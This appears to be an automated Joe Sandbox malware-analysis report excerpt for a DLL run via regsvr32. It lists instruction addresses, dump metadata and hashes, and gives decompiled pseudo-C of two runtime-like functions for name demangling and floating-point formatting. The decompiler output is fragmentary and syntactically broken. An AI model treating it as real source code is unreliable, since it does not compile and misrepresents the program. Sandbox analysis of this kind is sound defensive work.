                                                                                                              0x18000667c
                                                                                                              0x180006686
                                                                                                              0x18000668c
                                                                                                              0x180006696
                                                                                                              0x18000669b
                                                                                                              0x1800066a9
                                                                                                              0x1800066b4
                                                                                                              0x1800066b8
                                                                                                              0x1800066ba
                                                                                                              0x1800066c5
                                                                                                              0x1800066cc
                                                                                                              0x1800066e0
                                                                                                              0x1800066e5
                                                                                                              0x1800066f1
                                                                                                              0x1800066fb
                                                                                                              0x180006702
                                                                                                              0x18000670a
                                                                                                              0x180006712
                                                                                                              0x180006717
                                                                                                              0x18000671b
                                                                                                              0x18000671e
                                                                                                              0x180006722
                                                                                                              0x180006725
                                                                                                              0x180006729
                                                                                                              0x18000672c
                                                                                                              0x180006731
                                                                                                              0x180006735
                                                                                                              0x180006739
                                                                                                              0x18000673f
                                                                                                              0x18000674c
                                                                                                              0x18000675a
                                                                                                              0x180006763
                                                                                                              0x180006772
                                                                                                              0x18000677c
                                                                                                              0x18000677f
                                                                                                              0x180006789
                                                                                                              0x18000678d
                                                                                                              0x180006791
                                                                                                              0x180006794
                                                                                                              0x18000679b
                                                                                                              0x1800067a4
                                                                                                              0x1800067ae
                                                                                                              0x1800067b6
                                                                                                              0x1800067bb
                                                                                                              0x1800067c0
                                                                                                              0x1800067cc
                                                                                                              0x1800067d5
                                                                                                              0x1800067e0
                                                                                                              0x1800067f2
                                                                                                              0x1800067f4
                                                                                                              0x1800067fa
                                                                                                              0x180006800
                                                                                                              0x180006805
                                                                                                              0x180006809
                                                                                                              0x180006813
                                                                                                              0x180006815
                                                                                                              0x18000681e
                                                                                                              0x180006821
                                                                                                              0x180006825
                                                                                                              0x18000682a
                                                                                                              0x18000682f
                                                                                                              0x180006834
                                                                                                              0x18000683c
                                                                                                              0x18000683e
                                                                                                              0x180006848
                                                                                                              0x180006851
                                                                                                              0x180006855
                                                                                                              0x18000685e
                                                                                                              0x180006864
                                                                                                              0x180006867
                                                                                                              0x18000686d
                                                                                                              0x18000687b
                                                                                                              0x180006884
                                                                                                              0x18000688e
                                                                                                              0x180006890
                                                                                                              0x1800068a2
                                                                                                              0x1800068a7
                                                                                                              0x1800068ad
                                                                                                              0x1800068b2
                                                                                                              0x1800068b6
                                                                                                              0x1800068be
                                                                                                              0x1800068c7
                                                                                                              0x1800068d3
                                                                                                              0x1800068d7
                                                                                                              0x1800068db
                                                                                                              0x1800068df
                                                                                                              0x1800068e2
                                                                                                              0x1800068f3
                                                                                                              0x180006902
                                                                                                              0x180006907
                                                                                                              0x180006909
                                                                                                              0x180006918
                                                                                                              0x18000691e
                                                                                                              0x18000692c
                                                                                                              0x180006930
                                                                                                              0x180006937
                                                                                                              0x180006939
                                                                                                              0x180006942
                                                                                                              0x180006949
                                                                                                              0x18000694d
                                                                                                              0x180006953
                                                                                                              0x18000695b
                                                                                                              0x18000695f
                                                                                                              0x180006964
                                                                                                              0x18000696e
                                                                                                              0x180006975
                                                                                                              0x180006978
                                                                                                              0x18000698a
                                                                                                              0x180006999
                                                                                                              0x1800069a8
                                                                                                              0x1800069b3
                                                                                                              0x1800069c0
                                                                                                              0x1800069d2
                                                                                                              0x1800069d8
                                                                                                              0x1800069e0
                                                                                                              0x1800069e7
                                                                                                              0x1800069f1
                                                                                                              0x1800069fa
                                                                                                              0x180006a00
                                                                                                              0x180006a11
                                                                                                              0x180006a16
                                                                                                              0x180006a23
                                                                                                              0x180006a33
                                                                                                              0x180006a38
                                                                                                              0x180006a42
                                                                                                              0x180006a52
                                                                                                              0x180006a5f
                                                                                                              0x180006a70
                                                                                                              0x180006a7b
                                                                                                              0x180006a7d
                                                                                                              0x180006a80
                                                                                                              0x180006a83
                                                                                                              0x180006a85
                                                                                                              0x180006a8b
                                                                                                              0x180006a8f
                                                                                                              0x180006a97
                                                                                                              0x180006a9a
                                                                                                              0x180006a9e
                                                                                                              0x180006aa1
                                                                                                              0x180006aab
                                                                                                              0x180006aad
                                                                                                              0x180006abc
                                                                                                              0x180006ac6
                                                                                                              0x180006ad0
                                                                                                              0x180006ad6
                                                                                                              0x180006adb
                                                                                                              0x180006ae7
                                                                                                              0x180006af5
                                                                                                              0x180006af8
                                                                                                              0x180006b05
                                                                                                              0x180006b0a
                                                                                                              0x180006b0c
                                                                                                              0x180006b1b
                                                                                                              0x180006b25
                                                                                                              0x180006b2f
                                                                                                              0x180006b35
                                                                                                              0x180006b3a
                                                                                                              0x180006b3f
                                                                                                              0x180006b46
                                                                                                              0x180006b50
                                                                                                              0x180006b5f
                                                                                                              0x180006b65
                                                                                                              0x180006b72
                                                                                                              0x180006b7e
                                                                                                              0x180006b80
                                                                                                              0x180006b88
                                                                                                              0x180006b8c
                                                                                                              0x180006b97
                                                                                                              0x180006b9c
                                                                                                              0x180006ba7
                                                                                                              0x180006bae
                                                                                                              0x180006bb1
                                                                                                              0x180006bb6
                                                                                                              0x180006bc3
                                                                                                              0x180006bc8
                                                                                                              0x180006bd4
                                                                                                              0x180006be1
                                                                                                              0x180006bed
                                                                                                              0x180006bfb
                                                                                                              0x180006bfd
                                                                                                              0x180006c06
                                                                                                              0x180006c0b
                                                                                                              0x180006c22
                                                                                                              0x180006c24
                                                                                                              0x180006c31
                                                                                                              0x180006c36
                                                                                                              0x180006c38
                                                                                                              0x180006c42
                                                                                                              0x180006c47
                                                                                                              0x180006c59
                                                                                                              0x180006c62
                                                                                                              0x180006c6f
                                                                                                              0x180006c74
                                                                                                              0x180006c86
                                                                                                              0x180006c88
                                                                                                              0x180006c95
                                                                                                              0x180006c9a
                                                                                                              0x180006c9c
                                                                                                              0x180006ca6
                                                                                                              0x180006cab
                                                                                                              0x180006cbd
                                                                                                              0x180006cc6
                                                                                                              0x180006cd0
                                                                                                              0x180006cd5
                                                                                                              0x180006ce7
                                                                                                              0x180006ceb
                                                                                                              0x180006cf8
                                                                                                              0x180006d01
                                                                                                              0x180006d0f
                                                                                                              0x180006d16
                                                                                                              0x180006d1e
                                                                                                              0x180006d26
                                                                                                              0x180006d2b
                                                                                                              0x180006d34
                                                                                                              0x180006d39
                                                                                                              0x180006d3e
                                                                                                              0x180006d47
                                                                                                              0x180006d52
                                                                                                              0x180006d5d
                                                                                                              0x180006d67
                                                                                                              0x180006d6c
                                                                                                              0x180006d74
                                                                                                              0x180006d76
                                                                                                              0x180006d7d
                                                                                                              0x180006d85
                                                                                                              0x180006d8f
                                                                                                              0x180006d99
                                                                                                              0x180006d9c
                                                                                                              0x180006da2
                                                                                                              0x180006dae
                                                                                                              0x180006db1
                                                                                                              0x180006dc2
                                                                                                              0x180006dd2
                                                                                                              0x180006dd7
                                                                                                              0x180006de6
                                                                                                              0x180006df0
                                                                                                              0x180006df5
                                                                                                              0x180006dfc
                                                                                                              0x180006dff
                                                                                                              0x180006e06
                                                                                                              0x180006e13
                                                                                                              0x180006e19
                                                                                                              0x180006e1c
                                                                                                              0x180006e22
                                                                                                              0x180006e2a
                                                                                                              0x180006e2d
                                                                                                              0x180006e2f
                                                                                                              0x180006e3f
                                                                                                              0x180006e47
                                                                                                              0x180006e4a
                                                                                                              0x180006e60
                                                                                                              0x180006e64
                                                                                                              0x180006e66
                                                                                                              0x180006e75
                                                                                                              0x180006e7f
                                                                                                              0x180006e89
                                                                                                              0x180006e8f
                                                                                                              0x180006e94
                                                                                                              0x180006ea6
                                                                                                              0x180006eaa
                                                                                                              0x180006eb3
                                                                                                              0x180006ebb
                                                                                                              0x180006ec5
                                                                                                              0x180006ecf
                                                                                                              0x180006ed5
                                                                                                              0x180006eda
                                                                                                              0x180006ee9
                                                                                                              0x180006eed
                                                                                                              0x180006ef6
                                                                                                              0x180006efe
                                                                                                              0x180006f03
                                                                                                              0x180006f0f
                                                                                                              0x180006f17
                                                                                                              0x180006f1d
                                                                                                              0x180006f2e
                                                                                                              0x180006f32
                                                                                                              0x180006f41
                                                                                                              0x180006f45
                                                                                                              0x180006f47
                                                                                                              0x180006f52
                                                                                                              0x180006f59
                                                                                                              0x180006f6d
                                                                                                              0x180006f72
                                                                                                              0x180006f77
                                                                                                              0x180006f80
                                                                                                              0x180006f8c
                                                                                                              0x180006f97
                                                                                                              0x180006f9c
                                                                                                              0x180006fa6
                                                                                                              0x180006fac
                                                                                                              0x180006faf
                                                                                                              0x180006fb2
                                                                                                              0x180006fb8
                                                                                                              0x180006fbe
                                                                                                              0x180006fcb
                                                                                                              0x180006fd9
                                                                                                              0x180006fdf
                                                                                                              0x180006feb
                                                                                                              0x180006fee
                                                                                                              0x180006ff0
                                                                                                              0x180006ff2
                                                                                                              0x180007001
                                                                                                              0x18000700b
                                                                                                              0x180007015
                                                                                                              0x18000701b
                                                                                                              0x18000702d
                                                                                                              0x180007037
                                                                                                              0x180007040
                                                                                                              0x180007047
                                                                                                              0x180007049
                                                                                                              0x18000704f
                                                                                                              0x180007051
                                                                                                              0x180007055
                                                                                                              0x180007057
                                                                                                              0x180007062
                                                                                                              0x18000706a
                                                                                                              0x18000706c
                                                                                                              0x180007078
                                                                                                              0x180007082
                                                                                                              0x18000708c
                                                                                                              0x180007092
                                                                                                              0x1800070a4
                                                                                                              0x1800070ae
                                                                                                              0x1800070b7
                                                                                                              0x1800070c1
                                                                                                              0x1800070ce
                                                                                                              0x1800070d8
                                                                                                              0x1800070de
                                                                                                              0x1800070e7
                                                                                                              0x1800070ea
                                                                                                              0x1800070ec
                                                                                                              0x1800070f5
                                                                                                              0x1800070fd
                                                                                                              0x180007101
                                                                                                              0x18000710c
                                                                                                              0x180007119
                                                                                                              0x18000711c
                                                                                                              0x18000711e
                                                                                                              0x180007127
                                                                                                              0x18000712c
                                                                                                              0x180007130
                                                                                                              0x180007137
                                                                                                              0x180007140
                                                                                                              0x180007143
                                                                                                              0x180007145
                                                                                                              0x18000714e
                                                                                                              0x180007153
                                                                                                              0x18000715d
                                                                                                              0x180007167
                                                                                                              0x18000716d
                                                                                                              0x18000717f
                                                                                                              0x180007189
                                                                                                              0x18000718e
                                                                                                              0x180007192
                                                                                                              0x180007198
                                                                                                              0x1800071a6
                                                                                                              0x1800071a8
                                                                                                              0x1800071b2
                                                                                                              0x1800071b4
                                                                                                              0x1800071c0
                                                                                                              0x1800071ca
                                                                                                              0x1800071d4
                                                                                                              0x1800071da
                                                                                                              0x1800071ec
                                                                                                              0x1800071f6
                                                                                                              0x1800071ff
                                                                                                              0x180007203
                                                                                                              0x180007207
                                                                                                              0x180007209
                                                                                                              0x180007215
                                                                                                              0x18000721f
                                                                                                              0x180007229
                                                                                                              0x18000722f
                                                                                                              0x180007241
                                                                                                              0x18000724b
                                                                                                              0x180007254
                                                                                                              0x18000725d
                                                                                                              0x180007260
                                                                                                              0x180007264
                                                                                                              0x180007284

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                                              • API String ID: 2943138195-2884338863
                                                                                                              • Opcode ID: 9996b898fdf9c7f61a8902c657813e9135e409a7b9ea31997c7f31164e737c16
                                                                                                              • Instruction ID: 38a8b835958b1ac93c59d23635b2bfc8a768ce39e22b1b6e5a496439ceeb169b
                                                                                                              • Opcode Fuzzy Hash: 9996b898fdf9c7f61a8902c657813e9135e409a7b9ea31997c7f31164e737c16
                                                                                                              • Instruction Fuzzy Hash: D0928A72614B8986E792CF14E4813EEB7A1F7883D4F509125FA8A47B99DF7CC648CB40
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004F2FC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1203COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118004F2FC(void* __edx, void* __rbx, unsigned int __rcx, void* __rdi, void* __rsi, long long __r9, signed int __r10, void* __r12, void* __r14, void* __r15) {
				signed long long _t32;
				void* _t43;
				void* _t45;
				void* _t46;
				signed long long _t47;
				long long _t54;

				_t43 = __rdi;
				_t1 = _t46 - 0x6e0; // 0xf86f
				_t45 = _t1;
				_t47 = _t46 - 0x7e0;
				_t32 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t45 + 0x6d0) = _t32 ^ _t47;
				_t54 =  *((intOrPtr*)(_t45 + 0x740));
				 *(_t47 + 0x30) = __rcx;
				_t5 = _t47 + 0x60; // 0xffaf
				 *((long long*)(_t47 + 0x78)) = _t54;
				 *((long long*)(_t45 - 0x78)) = __r9;
				 *((intOrPtr*)(_t47 + 0x74)) = r8d;
				E000000011800554FC(_t5);
				r15d = 1;
				if (( *(_t47 + 0x60) & 0x0000001f) != 0x1f) goto 0x8004f368;
				 *((char*)(_t47 + 0x68)) = 0;
				goto 0x8004f377;
				_t11 = _t47 + 0x60; // 0xffaf
				E00000001180055568(( *(_t47 + 0x60) & 0x0000001f) - 0x1f, _t11);
				 *((intOrPtr*)(_t47 + 0x68)) = r15b;
				 *((long long*)(__r9 + 8)) = _t54;
				_t15 = _t43 + 0xd; // 0x2d
				_t22 =  <  ? _t15 : 0x20;
				r8d = 0;
				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
				_t16 = _t47 + 0x70; // 0xffbf
				E00000001180055498(0, _t32 ^ _t47, _t16);
				r10d = 0x7ff;
				if (( *(_t47 + 0x30) >> 0x00000034 & __r10) != 0) goto 0x8004f3e2;
			}









                                                                                                              0x18004f2fc
                                                                                                              0x18004f307
                                                                                                              0x18004f307
                                                                                                              0x18004f30f
                                                                                                              0x18004f316
                                                                                                              0x18004f320
                                                                                                              0x18004f327
                                                                                                              0x18004f331
                                                                                                              0x18004f338
                                                                                                              0x18004f33d
                                                                                                              0x18004f342
                                                                                                              0x18004f346
                                                                                                              0x18004f34b
                                                                                                              0x18004f354
                                                                                                              0x18004f35f
                                                                                                              0x18004f361
                                                                                                              0x18004f366
                                                                                                              0x18004f368
                                                                                                              0x18004f36d
                                                                                                              0x18004f372
                                                                                                              0x18004f383
                                                                                                              0x18004f38b
                                                                                                              0x18004f38e
                                                                                                              0x18004f391
                                                                                                              0x18004f396
                                                                                                              0x18004f39a
                                                                                                              0x18004f39f
                                                                                                              0x18004f3a7
                                                                                                              0x18004f3be

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                              • API String ID: 808467561-2761157908
                                                                                                              • Opcode ID: f56f59af8078ee590524fc43da97128e225f178fe4561738577511b2b190010c
                                                                                                              • Instruction ID: 252028ae8c255fcc82f6d6c86281c3d316ac320ff36e065d84238f58276b53d1
                                                                                                              • Opcode Fuzzy Hash: f56f59af8078ee590524fc43da97128e225f178fe4561738577511b2b190010c
                                                                                                              • Instruction Fuzzy Hash: 9FB2C1726106888BE7B68F64D980BED37A1F7483C8F619115FA0667B88DF35DB08CB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004CEC8 Relevance: 16.9, APIs: 8, Strings: 1, Instructions: 1137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 47%
                                                                                                              			E0000000118004CEC8(intOrPtr __ebx, signed int __ecx, signed int __edx, long long __rbx, signed int __r9, signed int __r10) {
				void* __rsi;
				void* __r13;
				void* _t480;
				signed long long _t507;
				signed long long _t516;
				unsigned int _t526;
				intOrPtr _t533;
				signed long long _t556;
				unsigned int _t561;
				intOrPtr _t568;
				signed long long _t591;
				void* _t598;
				void* _t602;
				signed int _t614;
				signed int _t619;
				signed int _t620;
				signed long long _t623;
				intOrPtr _t626;
				signed int _t629;
				signed long long _t658;
				signed int _t665;
				signed long long _t670;
				intOrPtr _t675;
				signed long long _t676;
				char _t679;
				signed int _t682;
				signed int _t688;
				signed int _t694;
				signed int _t736;
				intOrPtr _t750;
				void* _t753;
				void* _t754;
				void* _t769;
				void* _t778;
				void* _t791;
				void* _t799;
				void* _t840;
				void* _t880;
				signed long long _t914;
				signed long long _t924;
				void* _t926;
				signed long long _t936;
				signed int _t937;
				signed long long _t938;
				void* _t943;
				signed int* _t944;
				signed long long _t948;
				signed long long _t951;
				long long _t961;
				signed long long _t965;
				signed long long _t967;
				long long _t977;
				void* _t992;
				unsigned long long _t995;
				signed long long _t996;
				void* _t1000;
				signed long long _t1003;
				signed long long _t1007;
				void* _t1009;
				void* _t1012;
				long long _t1015;
				signed long long _t1019;
				signed long long _t1021;
				signed long long _t1022;
				void* _t1023;
				signed long long _t1024;
				void* _t1026;
				signed long long _t1028;
				char* _t1032;
				void* _t1034;
				void* _t1035;
				void* _t1037;
				signed long long _t1038;
				signed long long _t1042;
				signed long long _t1043;
				signed long long _t1055;
				signed long long _t1056;
				signed long long _t1069;
				signed long long _t1070;
				signed int _t1084;
				void* _t1094;
				void* _t1096;
				void* _t1102;
				void* _t1104;

				_t1084 = __r9;
				_t629 = __ecx;
				 *((long long*)(_t1037 + 0x18)) = __rbx;
				_t1035 = _t1037 - 0x6c0;
				_t1038 = _t1037 - 0x7c0;
				_t914 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t1035 + 0x6b0) = _t914 ^ _t1038;
				 *((long long*)(_t1038 + 0x48)) =  *((intOrPtr*)(_t1035 + 0x720));
				 *((long long*)(_t1038 + 0x60)) =  *((intOrPtr*)(_t1035 + 0x728));
				 *(_t1038 + 0x44) = r8d;
				 *((intOrPtr*)(_t1038 + 0x40)) = __edx;
				asm("movsd [esp+0x38], xmm0");
				_t995 =  *((intOrPtr*)(_t1038 + 0x38));
				 *((long long*)(_t1038 + 0x58)) = __r9;
				r9d = 0x7ff;
				asm("dec eax");
				_t996 = _t995 & 0xffffffff;
				_t948 =  ~(_t995 >> 0x00000034 & __r9);
				asm("sbb eax, eax");
				r8d = r8d & r9d;
				0x80055680();
				E000000011800555B8(_t480, _t995 >> 0x34);
				asm("cvttsd2si ecx, xmm0");
				 *((intOrPtr*)(_t1038 + 0x74)) = __ebx;
				_t14 = _t1028 - 1; // 0x1
				r12d = _t14;
				asm("inc ebp");
				r13d = r13d & _t629;
				 *((intOrPtr*)(_t1038 + 0x78)) = __ebx;
				 *(_t1038 + 0x20) = r13d;
				asm("sbb edx, edx");
				r14d = 0;
				_t682 =  ~__edx + r12d;
				 *(_t1038 + 0x70) = _t682;
				if (_t1028 + 0xffffffff + r8d - 0x434 < 0) goto 0x8004d20d;
				 *((intOrPtr*)(_t1035 + 0x318)) = 0x100000;
				 *((intOrPtr*)(_t1035 + 0x314)) = 0;
				 *(_t1035 + 0x310) = 2;
				if (__ebx == 0) goto 0x8004d109;
				r8d = r14d;
				if ( *((intOrPtr*)(_t1035 + 0x314 + _t948 * 4)) !=  *((intOrPtr*)(_t1038 + 0x74 + _t948 * 4))) goto 0x8004d109;
				r8d = r8d + r12d;
				_t769 = r8d - 2;
				if (_t769 != 0) goto 0x8004cfea;
				r11d = _t1024 - 0x432;
				 *(_t1038 + 0x28) = r14d;
				r9d = r11d;
				r8d = 0x20;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				_t619 = __ebx - r12d;
				asm("bsr eax, [esp+eax*4+0x74]");
				r12d = _t619;
				r12d =  !r12d;
				if (_t769 == 0) goto 0x8004d048;
				goto 0x8004d04b;
				r8d = r8d - r14d;
				if (_t996 + __r9 - 0x73 > 0) goto 0x8004d0e5;
				r15d = r14d;
				r15b = r11d - r8d > 0;
				r15d = r15d + _t682;
				r15d = r15d + r9d;
				if (r15d - 0x73 > 0) goto 0x8004d0e5;
				_t753 = __r9 - 1;
				_t33 = _t1104 - 1; // -1
				r10d = _t33;
				if (r10d == _t753) goto 0x8004d0c8;
				if (r10d - r9d - _t682 >= 0) goto 0x8004d092;
				r8d =  *(_t1038 + 0x40000000000070);
				goto 0x8004d095;
				r8d = r14d;
				if (0xffffffffffffe - _t682 >= 0) goto 0x8004d09f;
				goto 0x8004d0a2;
				r8d = r8d & _t619;
				r8d = r8d << r11d;
				 *(_t1038 + 0x74 + __r10 * 4) = (r14d & r12d) >> r8d - r11d | r8d;
				r10d = r10d - 1;
				if (r10d == _t753) goto 0x8004d0c8;
				_t688 =  *(_t1038 + 0x70);
				goto 0x8004d07e;
				if (r9d == 0) goto 0x8004d0de;
				 *(_t1038 + 0x40000000000070) = r14d;
				_t778 = r14d + 1 - r9d;
				if (_t778 != 0) goto 0x8004d0d0;
				 *(_t1038 + 0x70) = r15d;
				goto 0x8004d0ed;
				r15d = r14d;
				 *(_t1038 + 0x70) = r14d;
				r12d = 1;
				 *(_t1035 + 0x144) = 4;
				 *(_t1035 + 0x140) = r12d;
				goto 0x8004d451;
				r11d = _t1024 - 0x433;
				 *(_t1038 + 0x28) = r14d;
				r9d = r11d;
				r8d = 0x20;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				_t736 = r8d - r11d;
				_t620 = _t619 - r12d;
				asm("bsr eax, [esp+eax*4+0x74]");
				r12d = _t620;
				r12d =  !r12d;
				if (_t778 == 0) goto 0x8004d14b;
				goto 0x8004d14e;
				r8d = r8d - r14d;
				if (_t996 + __r9 - 0x73 > 0) goto 0x8004d1ed;
				r15d = r14d;
				r15b = r11d - r8d > 0;
				r15d = r15d + _t688;
				r15d = r15d + r9d;
				if (r15d - 0x73 > 0) goto 0x8004d1ed;
				_t754 = __r9 - 1;
				_t57 = _t1104 - 1; // -1
				r10d = _t57;
				if (r10d == _t754) goto 0x8004d1cb;
				if (r10d - r9d - _t688 >= 0) goto 0x8004d195;
				r8d =  *(_t1038 + 0x40000000000070);
				goto 0x8004d198;
				r8d = r14d;
				if (0xffffffffffffe - _t688 >= 0) goto 0x8004d1a2;
				goto 0x8004d1a5;
				r8d = r8d & _t620;
				r8d = r8d << r11d;
				 *(_t1038 + 0x74 + __r10 * 4) = (r14d & r12d) >> _t736 | r8d;
				r10d = r10d - 1;
				if (r10d == _t754) goto 0x8004d1cb;
				_t694 =  *(_t1038 + 0x70);
				goto 0x8004d181;
				if (r9d == 0) goto 0x8004d1e1;
				 *(_t1038 + 0x40000000000070) = r14d;
				if (r14d + 1 != r9d) goto 0x8004d1d3;
				 *(_t1038 + 0x70) = r15d;
				goto 0x8004d1f5;
				r15d = r14d;
				 *(_t1038 + 0x70) = r14d;
				r12d = 1;
				 *(_t1035 + 0x144) = 2;
				 *(_t1035 + 0x140) = r12d;
				goto 0x8004d451;
				if (_t736 == 0x36) goto 0x8004d361;
				 *((intOrPtr*)(_t1035 + 0x318)) = 0x100000;
				 *((intOrPtr*)(_t1035 + 0x314)) = 0;
				 *(_t1035 + 0x310) = 2;
				if (_t620 == 0) goto 0x8004d361;
				r8d = r14d;
				if ( *((intOrPtr*)(_t1035 + 0x314 + _t948 * 4)) !=  *((intOrPtr*)(_t1038 + 0x74 + _t948 * 4))) goto 0x8004d361;
				r8d = r8d + r12d;
				_t791 = r8d - 2;
				if (_t791 != 0) goto 0x8004d239;
				asm("bsr eax, ebx");
				 *(_t1038 + 0x28) = r14d;
				if (_t791 == 0) goto 0x8004d263;
				goto 0x8004d266;
				r15d = r14d;
				r8d = 0x20;
				r8d = r8d - r14d;
				r15b = r8d - 2 > 0;
				r11d = r11d | 0xffffffff;
				r15d = r15d + _t694;
				if (r15d - 0x73 <= 0) goto 0x8004d290;
				r15d = r14d;
				 *(_t1038 + 0x70) = r14d;
				goto 0x8004d2e2;
				_t87 = _t1104 - 1; // -1
				_t507 = _t87;
				if (_t507 == r11d) goto 0x8004d2dd;
				r10d = _t507;
				r8d = 0xffffffffffffe;
				if (_t507 - _t694 >= 0) goto 0x8004d2ab;
				r9d =  *(_t1038 + 0x74 + __r10 * 4);
				goto 0x8004d2ae;
				r9d = r14d;
				if (r8d - _t694 >= 0) goto 0x8004d2ba;
				goto 0x8004d2bd;
				 *(_t1038 + 0x74 + __r10 * 4) = r14d >> 0x0000001e | __r9 * 0x00000004;
				if (r8d == r11d) goto 0x8004d2dd;
				goto 0x8004d299;
				 *(_t1038 + 0x70) = r15d;
				_t936 = _t1024 * 4;
				_t1042 = _t936;
				E000000011800046A0(r8d, 0, _t1035 + 0x314, _t996, _t1042);
				 *(_t1035 + _t936 + 0x314) = r12d << sil;
				_t105 = _t1024 + 1; // 0x437
				r12d = _t105;
				r8d = r12d;
				_t1043 = _t1042 << 2;
				 *(_t1035 + 0x310) = r12d;
				 *(_t1035 + 0x140) = r12d;
				if (_t1043 == 0) goto 0x8004d451;
				_t799 = _t1043 - _t936;
				if (_t799 > 0) goto 0x8004d430;
				E00000001180003FF0();
				goto 0x8004d44a;
				 *(_t1038 + 0x28) = r14d;
				asm("dec eax");
				asm("bsr eax, [esp+eax+0x74]");
				if (_t799 == 0) goto 0x8004d379;
				goto 0x8004d37c;
				r15d = r14d;
				r8d = 0x20;
				r8d = r8d - r14d;
				r15b = r8d - r12d > 0;
				r11d = r11d | 0xffffffff;
				r15d = r15d;
				if (r15d - 0x73 <= 0) goto 0x8004d3a6;
				r15d = r14d;
				 *(_t1038 + 0x70) = r14d;
				goto 0x8004d3f4;
				_t112 = _t1104 - 1; // -1
				_t516 = _t112;
				if (_t516 == r11d) goto 0x8004d3ef;
				r10d = _t516;
				r8d = 0xffffffffffffe;
				if (_t516 >= 0) goto 0x8004d3c1;
				r9d =  *(_t1038 + 0x74 + __r10 * 4);
				goto 0x8004d3c4;
				r9d = r14d;
				if (r8d >= 0) goto 0x8004d3d0;
				goto 0x8004d3d3;
				 *(_t1038 + 0x74 + __r10 * 4) = r14d >> 0x0000001f | _t1084 + _t1084;
				if (r8d == r11d) goto 0x8004d3ef;
				goto 0x8004d3af;
				 *(_t1038 + 0x70) = r15d;
				_t951 = _t1035 + 0x314;
				_t937 = _t1024 * 4;
				E000000011800046A0(r8d, 0, _t951, _t1035 + 0x314, _t937);
				 *(_t1035 + _t937 + 0x314) = r12d << sil;
				goto 0x8004d319;
				E000000011800046A0(r12d << sil, 0, _t951, _t1035 + 0x314, _t937);
				0x80013b18();
				 *0xffffffff = 0x22;
				0x80013928();
				r12d =  *(_t1035 + 0x140);
				if (r13d < 0) goto 0x8004d8fc;
				_t526 = 0xcccccccd * r13d >> 0x20 >> 3;
				 *(_t1038 + 0x34) = _t526;
				 *(_t1038 + 0x24) = _t526;
				if (_t526 == 0) goto 0x8004d84f;
				_t528 =  >  ? 0x26 : _t526;
				 *(_t1038 + 0x30) =  >  ? 0x26 : _t526;
				_t938 = _t951 * 4;
				 *(_t1035 + 0x310) = _t1028 + _t951;
				E000000011800046A0(_t1028 + _t951, 0, _t1035 + 0x314, _t1035 + 0x314, _t938);
				E00000001180003FF0();
				r10d =  *(_t1035 + 0x310);
				if (r10d - 1 > 0) goto 0x8004d562;
				_t533 =  *((intOrPtr*)(_t1035 + 0x314));
				if (_t533 != 0) goto 0x8004d518;
				r12d = r14d;
				 *(_t1035 + 0x140) = r14d;
				goto 0x8004d652;
				if (_t533 == 1) goto 0x8004d652;
				if (r12d == 0) goto 0x8004d652;
				r8d = r14d;
				r9d = r14d;
				r9d = r9d + 1;
				if (r9d != r12d) goto 0x8004d533;
				goto 0x8004d60d;
				if (r12d - 1 > 0) goto 0x8004d66f;
				_t623 =  *(_t1035 + 0x144);
				r12d = r10d;
				 *(_t1035 + 0x140) = r10d;
				if (0xffffffff << 2 == 0) goto 0x8004d5c8;
				if (0xffffffff << 2 - 0xffffffff > 0) goto 0x8004d5a7;
				_t1000 = _t1035 + 0x314;
				E00000001180003FF0();
				goto 0x8004d5c1;
				E000000011800046A0(0x1cc, 0, _t1035 + 0x144, _t1000, 0xffffffff);
				0x80013b18();
				 *0xffffffff = 0x22;
				0x80013928();
				r12d =  *(_t1035 + 0x140);
				if (_t623 == 0) goto 0x8004d509;
				if (_t623 == 1) goto 0x8004d652;
				if (r12d == 0) goto 0x8004d652;
